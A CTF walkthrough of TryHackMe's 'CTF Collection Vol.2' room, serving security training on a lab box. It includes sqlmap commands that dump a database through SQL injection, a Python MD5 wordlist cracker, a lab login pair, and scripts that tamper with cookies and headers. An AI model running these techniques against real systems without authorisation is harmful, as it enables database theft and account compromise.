TryHackMe Walkthrough - CTF Collection Vol.2

Egg-cellent room!

25/01/2021

Time for a bit more of a challenge with our first medium room walkthrough! Before doing this room, I'd suggest you get comfortable with Burp or ZAP, as I won't go into much detail about how to use them. You can check out the room, created by DesKel, here.

Easter 1

A good place to start is /robots.txt. If we head over there, we'll see a string of hex. Decode it and you've got flag 1!

Easter 2

There's also a resource listed in /robots.txt, but its name is gibberish, and visiting it as-is returns nothing. It is encoded in layers: decode it from base64, URL-decode the result, remove the spaces, decode from base64 again, remove the spaces again, and decode from base64 one more time, and you end up with a normal-looking path. Visit that page and the flag is in the source code. It is also on the page itself but not visible, so selecting all the text with Ctrl+A reveals it too.

Easter 3

This one was a freebie! I found it in the source code of /login!

Easter 4

Save a login request captured in ZAP or Burp to a file (I saved mine as "login.raw"), then hand it to sqlmap to enumerate the databases:

sqlmap -r login.raw --dbs

Then dump the "THM_f0und_m3" database.

sqlmap -r login.raw -D THM_f0und_m3 --dump

Note: This might take some time.

Easter 5

This one follows directly from Easter 4. Dumping the "THM_f0und_m3" database also dumps a table called "user", which holds the MD5 hash of DesKel's login password. Crack the hash (a wordlist attack is the quickest route) and log in at /login to get the flag.
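The hash cracking step, as an added example rather than anything from the room or the original post: a small offline wordlist attack against an MD5 digest, with a couple of mangling rules so "egg" also tries "Egg123" and friends. The target hash is md5("password") and the wordlist is constructed here; the real hash and password from the dumped "user" table are not reproduced.

```python
import hashlib
from typing import Iterable, Iterator, Optional

# Constructed sample: TARGET_HASH is md5("password"), standing in for the
# digest in the dumped "user" table; WORDLIST stands in for a real list
# such as rockyou.txt (the room's actual hash and password are not shown here).
TARGET_HASH = "5f4dcc3b5aa765d61d8327deb882cf99"
WORDLIST = ["letmein", "qwerty", "egg", "password", "deskel"]


def md5_hex(word: str) -> str:
    """Hex MD5 of a candidate; an unsalted digest like this is cheap to attack."""
    return hashlib.md5(word.encode("utf-8")).hexdigest()


def mangle(word: str) -> Iterator[str]:
    """Tiny rule set: the word plain and capitalised, each with common suffixes."""
    for base in (word, word.capitalize()):
        yield base
        for suffix in ("1", "123", "!"):
            yield base + suffix


def crack_md5(target_hex: str, wordlist: Iterable[str]) -> Optional[str]:
    """Return the first mangled wordlist entry whose MD5 equals target_hex, else None."""
    target_hex = target_hex.strip().lower()
    if len(target_hex) != 32 or any(c not in "0123456789abcdef" for c in target_hex):
        raise ValueError("expected a 32-character hex MD5 digest")
    for entry in wordlist:
        for candidate in mangle(entry.strip()):
            if md5_hex(candidate) == target_hex:
                return candidate
    return None


if __name__ == "__main__":
    print(crack_md5(TARGET_HASH, WORDLIST))  # password
```

For a real dump you would feed the digest to john or hashcat with a proper wordlist; the point here is the loop itself: unsalted MD5 means one hash computation per candidate, so a few million guesses take seconds.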

Easter 6

You can find this flag in the response headers of the landing page. Check them with a tool like ZAP.

Easter 7

Using Inspect Element, I changed the value of the "invite" cookie to "1". After refreshing the page, the flag was on the page.

Easter 8

Using ZAP, I resent a request to "index.php" with the "User-Agent" header changed to:

Mozilla/5.0 (iPhone; CPU iPhone OS 13_1_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.1 Mobile/15E148 Safari/604.1

I could then find the flag in the response!

Easter 9

This flag is in the source code of /ready. The page redirects quickly, so view the source before it does; intercepting the response in your proxy, or fetching the page with curl, sidesteps the redirect entirely.

Easter 10

Intercept a request to /freesub and change the Referer header to "tryhackme.com".

Easter 11

About halfway down the page, between the man looking at the food and the big red button, there is a drop-down menu. Tamper with the request it sends so that the "dinner" variable is "egg", because this guy loves eggs. The POST body will look like:

dinner=egg&submit=submit

Then we can find the flag in the response!

Easter 12

The page loads a fake jQuery file, "jquery-9.1.2.js", which defines a function called "ahem". Call it from the browser console (open via Inspect Element) by running "ahem()".

Easter 13

Press the button!

Easter 14

The page source contains a base64-encoded image. Paste it into CyberChef to turn it back into an actual image and read the flag.
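The same recovery done without CyberChef, as an added example (not code from the room or the original post): parse a data: URI or a bare base64 blob copied out of the page source, decode it, and sniff the magic bytes so the file gets the right extension. The sample URI below is constructed from a PNG signature plus filler; the real embedded image is not reproduced.

```python
import base64
import re
import urllib.parse

# Constructed sample: a data: URI carrying a PNG signature plus 17 filler
# bytes, standing in for the image embedded in the page source.
SAMPLE_DATA_URI = "data:image/png;base64," + base64.b64encode(
    b"\x89PNG\r\n\x1a\n" + b"\x00" * 17
).decode()

# Magic bytes for the image types you are likely to meet in an <img src>.
MAGIC = {
    b"\x89PNG\r\n\x1a\n": "png",
    b"\xff\xd8\xff": "jpg",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
    b"BM": "bmp",
}


def decode_data_uri(uri: str):
    """Return (declared mime, raw bytes) for a data: URI or a bare base64 string."""
    uri = uri.strip()
    if uri.startswith("data:"):
        header, _, payload = uri[5:].partition(",")
        params = header.split(";")
        mime = params[0] or "text/plain"
        is_b64 = "base64" in params[1:]
    else:  # bare base64 copied out of an attribute, no data: prefix
        mime, payload, is_b64 = "", uri, True
    if is_b64:
        payload = re.sub(r"\s+", "", payload)         # tolerate wrapped lines
        payload += "=" * (-len(payload) % 4)          # tolerate stripped padding
        data = base64.b64decode(payload, validate=True)
    else:
        data = urllib.parse.unquote_to_bytes(payload)  # percent-encoded data: URI
    return mime, data


def sniff_image_type(data: bytes) -> str:
    """Identify the image from its magic bytes, ignoring the declared mime."""
    for signature, kind in MAGIC.items():
        if data.startswith(signature):
            return kind
    return "unknown"


def save_embedded_image(uri: str, stem: str = "flag") -> str:
    """Decode the URI and write it to stem.<sniffed type>; returns the path."""
    _, data = decode_data_uri(uri)
    path = f"{stem}.{sniff_image_type(data)}"
    with open(path, "wb") as fh:
        fh.write(data)
    return path


if __name__ == "__main__":
    print(save_embedded_image(SAMPLE_DATA_URI))
```

Trusting the sniffed type over the declared mime matters in CTFs, where the src attribute is sometimes mislabelled on purpose.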

Easter 15

Go to /game1 and decode the characters with the cheat sheet below. Note that codes 10 through 14 appear twice in the sheet (r-v and 5-9), so those positions have to be resolved from context.

a=89
b=90
c=91
d=92
e=93
f=94
g=95
h=41
i=42
j=43
k=75
l=76
m=77
n=78
o=79
p=80
q=81
r=10
s=11
t=12
u=13
v=14
w=15
x=16
y=17
z=18

A=99
B=100
C=101
D=102
E=103
F=104
G=51
H=52
I=53
J=54
K=55
L=56
M=57
N=58
O=126
P=127
Q=128
R=129
S=130
T=131
U=136
V=137
W=138
X=139
Y=140
Z=141

1=23
2=24
3=25
4=26
5=10
6=11
7=12
8=13
9=14
0=22
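A decoder for the cheat sheet above, as an added example (not code from the room or the original post). It builds the reverse map from the table exactly as printed, so the codes 10 through 14, which the sheet assigns to both a letter and a digit, come out as bracketed candidate sets for you to resolve from context rather than being silently guessed.

```python
# The /game1 cheat sheet from this walkthrough, as character -> code.
CHEAT_SHEET = {}
for chars, codes in (
    ("abcdefg", range(89, 96)), ("hij", range(41, 44)), ("klmnopq", range(75, 82)),
    ("rstuvwxyz", range(10, 19)),
    ("ABCDEF", range(99, 105)), ("GHIJKLMN", range(51, 59)),
    ("OPQRST", range(126, 132)), ("UVWXYZ", range(136, 142)),
    ("1234", range(23, 27)), ("56789", range(10, 15)), ("0", [22]),
):
    CHEAT_SHEET.update(zip(chars, codes))

# Reverse map; a code that two characters share keeps both, in sheet order.
CODE_TO_CHARS = {}
for ch, code in CHEAT_SHEET.items():
    CODE_TO_CHARS.setdefault(code, []).append(ch)

# Codes the sheet assigns to more than one character (10..14 as printed).
AMBIGUOUS = {code for code, chars in CODE_TO_CHARS.items() if len(chars) > 1}


def decode_codes(codes) -> str:
    """Map each code to its character; '[r5]' marks a collision, '?' an unknown code."""
    out = []
    for code in codes:
        chars = CODE_TO_CHARS.get(code)
        if not chars:
            out.append("?")
        elif len(chars) == 1:
            out.append(chars[0])
        else:
            out.append("[" + "".join(chars) + "]")
    return "".join(out)


def decode_string(s: str, sep=None) -> str:
    """Decode a whitespace- (or sep-) separated run of codes, e.g. '89 90 10'."""
    return decode_codes(int(tok) for tok in s.split(sep))


def encode_text(text: str):
    """Inverse, for checking a guess: only characters in the sheet are allowed."""
    return [CHEAT_SHEET[ch] for ch in text]


if __name__ == "__main__":
    print(decode_string("89 90 10"))  # ab[r5]
```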

Easter 16

Using ZAP, I modified the request so that all three buttons are submitted at once, and the response contained the flag. The payload looks like:

button1=button1&button2=button2&button3=button3&submit=submit

Easter 17

I tried to use CyberChef for this but had some issues, so I used RapidTables instead. The chain is binary -> decimal -> hex -> ASCII.
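Both of the multi-step decodes in this room (the six-step base64/URL chain from Easter 2 and the binary -> decimal -> hex -> ASCII chain here) are just a list of string transforms applied in order, so here is a small pipeline that runs either chain and can print each intermediate value. This is an added example, not code from the room or the original post; the Easter 2 sample input is constructed by applying the chain in reverse, since the real robots.txt string is not reproduced.

```python
import base64
import urllib.parse


# Each step is str -> str so chains can be written as plain lists.
def from_base64(s: str) -> str:
    return base64.b64decode(s.strip()).decode("utf-8", errors="replace")


def url_decode(s: str) -> str:
    return urllib.parse.unquote(s)


def remove_spaces(s: str) -> str:
    return "".join(s.split())  # drops spaces, tabs and newlines alike


def bin_to_dec(s: str) -> str:
    return str(int("".join(s.split()), 2))


def dec_to_hex(s: str) -> str:
    h = format(int(s), "x")
    return h if len(h) % 2 == 0 else "0" + h  # a leading zero nibble is lost in decimal


def hex_to_ascii(s: str) -> str:
    return bytes.fromhex(s).decode("utf-8", errors="replace")


# Easter 2: base64 -> URL decode -> remove spaces -> base64 -> remove spaces -> base64
EASTER2_CHAIN = [from_base64, url_decode, remove_spaces, from_base64, remove_spaces, from_base64]
# Easter 17: binary -> decimal -> hex -> ASCII
EASTER17_CHAIN = [bin_to_dec, dec_to_hex, hex_to_ascii]


def run_chain(blob: str, chain, trace: bool = False) -> str:
    """Apply each step in order; trace=True prints every intermediate value."""
    for step in chain:
        blob = step(blob)
        if trace:
            print(f"{step.__name__:>13}: {blob!r}")
    return blob


def _space_every(s: str, n: int = 4) -> str:
    return " ".join(s[i:i + n] for i in range(0, len(s), n))


def make_easter2_sample(plain: str) -> str:
    """Constructed test input: the Easter 2 chain applied backwards to plain."""
    s = base64.b64encode(plain.encode()).decode()
    s = base64.b64encode(_space_every(s).encode()).decode()
    s = urllib.parse.quote(_space_every(s), safe="")
    return base64.b64encode(s.encode()).decode()


if __name__ == "__main__":
    run_chain(make_easter2_sample("/some_hidden_page"), EASTER2_CHAIN, trace=True)
    run_chain("0100100001101001", EASTER17_CHAIN, trace=True)
```

The decimal step in the Easter 17 chain can silently drop a leading zero nibble (0x0a21 becomes 2593, whose hex is "a21"), which is why dec_to_hex pads back to whole bytes before the ASCII step.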

Easter 18

Add a header to the request:

egg:Yes

You'll have to scroll down the response a bit to find the flag.

Easter 19

Run a dirb scan, you should find a directory called /small with the flag inside!

Easter 20

Send a POST request to the landing page with the credentials found at the bottom of the page. With curl:

curl -X POST -F 'username=DesKel' -F 'password=heIsDumb' http://10.10.192.159

The flag will be in the response!
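Most of this room (Easters 7, 8, 10, 11, 16, 18 and 20) comes down to one technique: resend a request with one header, cookie or form field changed and see whether the server behaves differently. Below is an added example, not code from the room or the original post, that scripts each of those tampers with the standard library and runs them against a constructed local stand-in for the app so it works offline. The stand-in's paths (/invite, /dinner, /buttons, /egg) and its flag strings are assumptions; only index.php, /freesub and the landing page come from the walkthrough. The login POST is sent URL-encoded, whereas the walkthrough's curl -F sends multipart, which is a simplification.

```python
import threading
import urllib.parse
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

IPHONE_UA = ("Mozilla/5.0 (iPhone; CPU iPhone OS 13_1_2 like Mac OS X) "
             "AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.1 Mobile/15E148 Safari/604.1")


class MockRoom(BaseHTTPRequestHandler):
    """Constructed stand-in for the room's checks; the real app's logic is unknown."""

    def log_message(self, *args):  # keep the test run quiet
        pass

    def _cookies(self):
        jar = {}
        for part in self.headers.get("Cookie", "").split(";"):
            if "=" in part:
                k, v = part.strip().split("=", 1)
                jar[k] = v
        return jar

    def _check(self, form):
        h, p = self.headers, self.path
        if p == "/invite" and self._cookies().get("invite") == "1":
            return "THM{cookie}"                         # Easter 7
        if p == "/index.php" and "iPhone" in h.get("User-Agent", ""):
            return "THM{user-agent}"                     # Easter 8
        if p == "/freesub" and "tryhackme.com" in h.get("Referer", ""):
            return "THM{referer}"                        # Easter 10
        if p == "/dinner" and form.get("dinner") == ["egg"]:
            return "THM{egg-dinner}"                     # Easter 11
        if p == "/buttons" and all(form.get(b) for b in ("button1", "button2", "button3")):
            return "THM{all-buttons}"                    # Easter 16
        if p == "/egg" and h.get("egg") == "Yes":
            return "THM{egg-header}"                     # Easter 18
        if p == "/" and form.get("username") == ["DesKel"] and form.get("password") == ["heIsDumb"]:
            return "THM{login}"                          # Easter 20
        return "nothing here"

    def _respond(self, text):
        body = text.encode()
        self.send_response(200)
        self.send_header("Content-Type", "text/plain")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def do_GET(self):
        self._respond(self._check({}))

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        form = urllib.parse.parse_qs(self.rfile.read(length).decode())
        self._respond(self._check(form))


def start_mock_room() -> str:
    """Serve MockRoom on a free localhost port in a background thread."""
    srv = HTTPServer(("127.0.0.1", 0), MockRoom)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return f"http://127.0.0.1:{srv.server_port}"


def send(url: str, headers=None, data=None) -> str:
    """One tampered request; a data dict turns it into a URL-encoded POST."""
    body = urllib.parse.urlencode(data).encode() if data else None
    req = urllib.request.Request(url, data=body, headers=headers or {})
    with urllib.request.urlopen(req, timeout=5) as resp:
        return resp.read().decode()


def solve_all(base: str) -> dict:
    """Each entry is the walkthrough's tamper for that Easter, scripted."""
    return {
        "easter7":  send(base + "/invite", headers={"Cookie": "invite=1"}),
        "easter8":  send(base + "/index.php", headers={"User-Agent": IPHONE_UA}),
        "easter10": send(base + "/freesub", headers={"Referer": "tryhackme.com"}),
        "easter11": send(base + "/dinner", data={"dinner": "egg", "submit": "submit"}),
        "easter16": send(base + "/buttons", data={"button1": "button1", "button2": "button2",
                                                  "button3": "button3", "submit": "submit"}),
        "easter18": send(base + "/egg", headers={"egg": "Yes"}),
        "easter20": send(base + "/", data={"username": "DesKel", "password": "heIsDumb"}),
    }


if __name__ == "__main__":
    for name, flag in solve_all(start_mock_room()).items():
        print(name, flag)
```

Against the real box, swap the base URL for the machine's address and drop the mock; the send() calls are what you would otherwise click through in ZAP's manual request editor.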

Conclusion

A real mix of challenges which I really enjoyed! Some came easy, others not so much! I hope this guide is useful in cracking some of the trickier challenges!